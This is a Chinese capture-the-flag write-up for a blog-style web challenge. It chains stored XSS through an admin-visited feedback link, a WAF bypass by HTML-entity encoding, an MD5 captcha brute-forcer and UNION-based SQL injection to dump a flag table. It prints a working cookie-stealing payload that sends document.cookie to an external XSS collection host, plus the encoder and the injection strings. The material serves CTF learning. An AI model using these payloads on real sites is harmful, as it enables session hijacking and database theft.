进入之后我们看到的是一个blog页面, 随便注册一个账号进入
通过扫描目录发现admin.php,访问后给出以下提示
所以这里我们需要一个admin的cookie
再来看各个页面的作用
- 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞
- 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie
大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie
使用内部的xss平台,截取以下代码
直接提交代码,发现这里有waf我们需要绕过,使用下面脚本进行编码绕过
in_str = "(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=suH793&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
output = ""
for c in in_str:
output += "&#" + str(ord(c))
print("<svg><script>eval("" + output + "")</script>") 提交代码后得到文章链接,将域名部分更改为web
这里还需要md5验证,使用下面脚本
import hashlib
def func(md5_val):
for x in range(999999, 100000000):
md5_value = hashlib.md5(str(x).encode("gb2312")).hexdigest() #这里使用gb2312加密方式
if md5_value[:6] == md5_val:
return str(x)
if __name__ == '__main__':
print(func('')) #这里写入页面的那6个字符
提交后即可在buu的xss平台得到admin的cookie
进入到admin.php中可以发现是一个sql注入,手工或者sqlmap
-2 union select 1,2,3#
-2 union select 1,database(),user()#
-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#
-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#
-2 union select 1,2,group_concat(flagg) from ciscn.flag#
406
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
